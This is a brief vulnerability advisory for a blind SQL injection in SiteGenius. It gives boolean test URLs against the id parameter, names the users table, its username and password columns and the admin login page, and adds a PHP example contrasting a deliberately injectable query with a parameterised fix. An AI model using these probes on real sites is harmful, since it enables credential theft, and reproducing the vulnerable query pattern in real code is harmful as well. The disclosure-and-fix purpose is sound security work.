=====================================================
SiteGenius Blind SQL injection vulnerability
=====================================================

# Exploit title : SiteGenius Blind SQL injection vulnerability
# Author : AutoRUN & dR.sqL
# Home : HackForums.AL , AutoRUN-Albania.COM , whiteh4t.net, HackingWith.US ,
# Software Link : http://www.sitegenius.com
# Versions affected : All

----------------------------------
# ~ ExpL0!taTi0N ~ #
----------------------------------

Affected files : topic.php & article.php

SQLi (blind) details:
Table: users ; Columns: username & password ; Panel (admin): /sitegenius/login.php

Exploit : http://www.2cto.com /sitegenius/topic.php?id=1 and 1=1 --> TRUE
Exploit : http://www.2cto.com /sitegenius/topic.php?id=1 and 1=2 --> FALSE

w00t!! Blind SQL injection !

Fix: filter the input of the id parameter on the topic.php page.
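
One way to apply that fix, as an added example and not SiteGenius's own code: the concatenated lookup that produces the TRUE/FALSE difference above, next to a version that validates id as an integer and binds it as a parameter. The in-memory SQLite table, the topics/title names and both function names are assumptions, since the advisory does not show the application's schema or source.

```php
<?php
// Constructed in-memory table standing in for the application's topic data.
// Table and column names (topics, id, title) are assumptions for illustration.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE topics (id INTEGER PRIMARY KEY, title TEXT)");
$db->exec("INSERT INTO topics (id, title) VALUES (1, 'Welcome')");

// Before: the raw parameter is concatenated into the SQL text, so anything
// after the number is parsed as SQL and becomes part of the WHERE clause.
function topic_vulnerable(PDO $db, string $rawId): ?string
{
    $row = $db->query("SELECT title FROM topics WHERE id = $rawId")->fetch(PDO::FETCH_ASSOC);
    return $row ? $row['title'] : null;
}

// After: accept only a positive integer, then bind it as a typed parameter
// so the value can never be parsed as SQL.
function topic_hardened(PDO $db, string $rawId): ?string
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // caller should answer with an error page, not run a query
    }
    $stmt = $db->prepare("SELECT title FROM topics WHERE id = :id");
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ? $row['title'] : null;
}

// A plain id plus the two id values quoted in the advisory.
foreach (['1', '1 and 1=1', '1 and 1=2'] as $id) {
    printf("%-12s vulnerable=%-10s hardened=%s\n",
        "'$id'",
        var_export(topic_vulnerable($db, $id), true),
        var_export(topic_hardened($db, $id), true));
}
```

The advisory also lists article.php as affected, so the same validation and binding belongs on its id handling.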